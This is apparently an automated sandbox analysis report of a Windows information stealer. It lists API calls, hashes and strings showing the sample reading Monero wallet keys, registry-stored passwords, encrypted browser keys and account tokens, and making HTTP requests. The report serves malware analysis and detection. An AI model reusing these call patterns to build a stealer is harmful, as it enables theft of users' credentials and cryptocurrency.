                        • Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
                        • Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                        • Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
                        • Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                        • Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
                      • lstrlen.KERNEL32(00000000), ref: 0074532F
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
                      • lstrlen.KERNEL32(00000000), ref: 00745383
                      • lstrlen.KERNEL32(00000000), ref: 007453AE
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 94675b90fd7d24f8676e185602f688a810290b7246d5f51f6e4f439b3d2e53e9
                      • Instruction ID: dd296fec91e1f24f45d988f8cfb7f25cce4dc3c0d7e6222b9f506404861525cd
                      • Opcode Fuzzy Hash: 94675b90fd7d24f8676e185602f688a810290b7246d5f51f6e4f439b3d2e53e9
                      • Instruction Fuzzy Hash: 4B513F70954148EBEB18FF60CD9AAED7779EF50305F504028F80A5B592EF386B46CB62
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: d6dab0d00ffffe4add4ace1a872da3d79611c5e832a1184f6096c799ef49191f
                      • Instruction ID: fb9014bd8093a1c5547f47cf8d0457da2f91b204292197e285c9156940eab460
                      • Opcode Fuzzy Hash: d6dab0d00ffffe4add4ace1a872da3d79611c5e832a1184f6096c799ef49191f
                      • Instruction Fuzzy Hash: 48C183B694021DEBCB14EF60DC89FEE7378BB54304F004599E50AA7241EB78AA85DF91
                      APIs
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 007442EC
                      • lstrcat.KERNEL32(?,013ED838), ref: 0074430B
                      • lstrcat.KERNEL32(?,?), ref: 0074431F
                      • lstrcat.KERNEL32(?,013ECF00), ref: 00744333
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 00748D90: GetFileAttributesA.KERNEL32(00000000,?,00731B54,?,?,0075564C,?,?,00750E1F), ref: 00748D9F
                        • Part of subcall function 00739CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00739D39
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                        • Part of subcall function 007493C0: GlobalAlloc.KERNEL32(00000000,007443DD,007443DD), ref: 007493D3
                      • StrStrA.SHLWAPI(?,013ED868), ref: 007443F3
                      • GlobalFree.KERNEL32(?), ref: 00744512
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                        • Part of subcall function 00739AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                        • Part of subcall function 00739AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                        • Part of subcall function 00739AC0: LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 007444A3
                      • StrCmpCA.SHLWAPI(?,007508D1), ref: 007444C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 007444D2
                      • lstrcat.KERNEL32(00000000,?), ref: 007444E5
                      • lstrcat.KERNEL32(00000000,00750FB8), ref: 007444F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: 33a14ffd374667d3b64afe51a26f04520ff57841fea444af9ed2839772240779
                      • Instruction ID: dacc34e96d0a349c72a35d7cb03203978e6ec6cda906788d79c6d898122d47f8
                      • Opcode Fuzzy Hash: 33a14ffd374667d3b64afe51a26f04520ff57841fea444af9ed2839772240779
                      • Instruction Fuzzy Hash: 6E7116B6910208B7DB14EBA0DC89FEE7379AB88300F044598F61997181EB78DB55DF92
                      APIs
                        • Part of subcall function 007312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007312B4
                        • Part of subcall function 007312A0: RtlAllocateHeap.NTDLL(00000000), ref: 007312BB
                        • Part of subcall function 007312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007312D7
                        • Part of subcall function 007312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007312F5
                        • Part of subcall function 007312A0: RegCloseKey.ADVAPI32(?), ref: 007312FF
                      • lstrcat.KERNEL32(?,00000000), ref: 0073134F
                      • lstrlen.KERNEL32(?), ref: 0073135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00731377
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00731465
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 007314EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 332aa866e70fc07d91bdb73de64a8a091aa31c5f022f0addd015b482f9ac0536
                      • Instruction ID: e12391d379c9d2a864c9cfd14425ec0cf153d431c687df7a670141304b60b27c
                      • Opcode Fuzzy Hash: 332aa866e70fc07d91bdb73de64a8a091aa31c5f022f0addd015b482f9ac0536
                      • Instruction Fuzzy Hash: 2D5147B2D50118E7D715FB60DD96BED737CAF54300F4041A8B60A62082EF786B89CF96
                      APIs
                        • Part of subcall function 007372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0073733A
                        • Part of subcall function 007372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
                        • Part of subcall function 007372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
                        • Part of subcall function 007372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00737452
                        • Part of subcall function 007372D0: HeapFree.KERNEL32(00000000), ref: 00737459
                      • lstrcat.KERNEL32(00000000,007517FC), ref: 00737606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00737648
                      • lstrcat.KERNEL32(00000000, : ), ref: 0073765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 0073768F
                      • lstrcat.KERNEL32(00000000,00751804), ref: 007376A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 007376D3
                      • lstrcat.KERNEL32(00000000,00751808), ref: 007376ED
                      • task.LIBCPMTD ref: 007376FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID: :
                      • API String ID: 2677904052-3653984579
                      • Opcode ID: 1321b6896859b4ee40a8b49835bc63d475fb60a796ed0d566e822c3546786618
                      • Instruction ID: 637ca05db81282946b3971db024c605b7d7ba86613af63d1a23dccc948e077f6
                      • Opcode Fuzzy Hash: 1321b6896859b4ee40a8b49835bc63d475fb60a796ed0d566e822c3546786618
                      • Instruction Fuzzy Hash: 273170B2914109DFDB48EBE4DC9ADFF7374BB84302F144018F116A7251DA38A986DB52
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013EDEC8,00000000,?,00750E2C,00000000,?,00000000), ref: 00748130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00748137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00748158
                      • __aulldiv.LIBCMT ref: 00748172
                      • __aulldiv.LIBCMT ref: 00748180
                      • wsprintfA.USER32 ref: 007481AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
                      • Instruction ID: 3509db1c7e13dfd780d87c3c59208bba0ac6c8abc4867e49412fb4d2646d1f79
                      • Opcode Fuzzy Hash: 8397b54f5e2d8f7cc9186925a1df9ad278d0ee4f5591a153642f03eb260803f5
                      • Instruction Fuzzy Hash: 7A211AB1E44218ABDB10DFD4CC49FAEB7B8FB44B14F104609F605BB280D77869018BA6
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                      • InternetOpenA.WININET(00750DF7,00000001,00000000,00000000,00000000), ref: 0073610F
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 00736147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0073618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007361B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 007361DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0073620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00736249
                      • InternetCloseHandle.WININET(?), ref: 00736253
                      • InternetCloseHandle.WININET(00000000), ref: 00736260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: 909bf25463437ffa053e050e5caa728b0fd3607eb6db739fd05c81aeae612118
                      • Instruction ID: 85ad3be9c392f88d4da6c8dd92508b3871669b0763efbe09a505d7084bdc784c
                      • Opcode Fuzzy Hash: 909bf25463437ffa053e050e5caa728b0fd3607eb6db739fd05c81aeae612118
                      • Instruction Fuzzy Hash: 36516FB1A40208FBEB24DF50DC49BEE77B8FB44705F108098A609A71C1DB796A85CF95
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0073733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007373B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0073740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00737452
                      • HeapFree.KERNEL32(00000000), ref: 00737459
                      • task.LIBCPMTD ref: 00737555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetask
                      • String ID: Password
                      • API String ID: 775622407-3434357891
                      • Opcode ID: 78f2b975e6e122be2878af10774dea33ccfa056cc1ed5b12383eb6a797cad7a9
                      • Instruction ID: 79868b0275d27ace5d0040a7ee3a94b14abcd6a36884db3dc826abf0bbebf4a1
                      • Opcode Fuzzy Hash: 78f2b975e6e122be2878af10774dea33ccfa056cc1ed5b12383eb6a797cad7a9
                      • Instruction Fuzzy Hash: 3A6110B591426CDBDB24DB50CD45BDA77B8BF44300F0081D9E68966142DBB46FC9CF91
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      • lstrlen.KERNEL32(00000000), ref: 0073BC9F
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0073BCCD
                      • lstrlen.KERNEL32(00000000), ref: 0073BDA5
                      • lstrlen.KERNEL32(00000000), ref: 0073BDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: ff4588dac77265bcb210b6365f0c044b8784ff60316af7eeb7f5eeb8efc0dd58
                      • Instruction ID: 22de9ddf7d3a2d86cb0eedfe227bfa362d8bac257b2625bb61d0492c312892d4
                      • Opcode Fuzzy Hash: ff4588dac77265bcb210b6365f0c044b8784ff60316af7eeb7f5eeb8efc0dd58
                      • Instruction Fuzzy Hash: 10B14572950108FBEB05FBA0DD5AEEE737CEF54305F404568F506A6092EF386A49CB62
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: c842f045d6caf00ce626804cb5671d4477f231b9ea87c1a5eacac519b331a16b
                      • Instruction ID: 766011eda18ac218e44758ca9c852521d05883c34d97e248a023f7ae1c6a92d3
